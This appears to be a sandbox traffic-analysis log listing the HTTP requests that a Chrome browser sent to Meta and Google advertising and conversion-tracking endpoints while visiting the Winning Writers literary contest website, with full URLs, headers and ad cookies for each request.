          Source: global trafficHTTP traffic detected: GET /tr/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960090650&cd[buttonFeatures]=%7B%22classList%22%3A%22button%20active%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22doneBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Done%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Done&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=2&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960090650&cd[buttonFeatures]=%7B%22classList%22%3A%22button%20active%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22doneBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Done%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Done&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=2&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960094422&cv=11&fst=1731960094422&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960094422&cv=11&fst=1731960094422&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960094422&cv=11&fst=1731960094422&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960094422&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7duq13hHBuZtclX5B00EIIb6tELzIg51cp6136o-gd9nI9nZ7J&random=2581496805&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960094422&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7duq13hHBuZtclX5B00EIIb6tELzIg51cp6136o-gd9nI9nZ7J&random=2581496805&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960102417&cv=11&fst=1731960102417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960102417&cv=11&fst=1731960102417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960102417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dtusx2cQIw_4VOHRK3OjLgAuQXVSXYjQPV2qDB1eM1HhBdV74&random=2945754585&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960102417&cv=11&fst=1731960102417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960102417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dtusx2cQIw_4VOHRK3OjLgAuQXVSXYjQPV2qDB1eM1HhBdV74&random=2945754585&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960116482&cv=11&fst=1731960116482&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960116482&cv=11&fst=1731960116482&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960116482&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dl-mIj4VTwUp_0jaEIja0RYzjgPxKXeUvJe0DH_7y1k3e7xyo&random=1607132100&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960116482&cv=11&fst=1731960116482&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960118416&cv=11&fst=1731960118416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
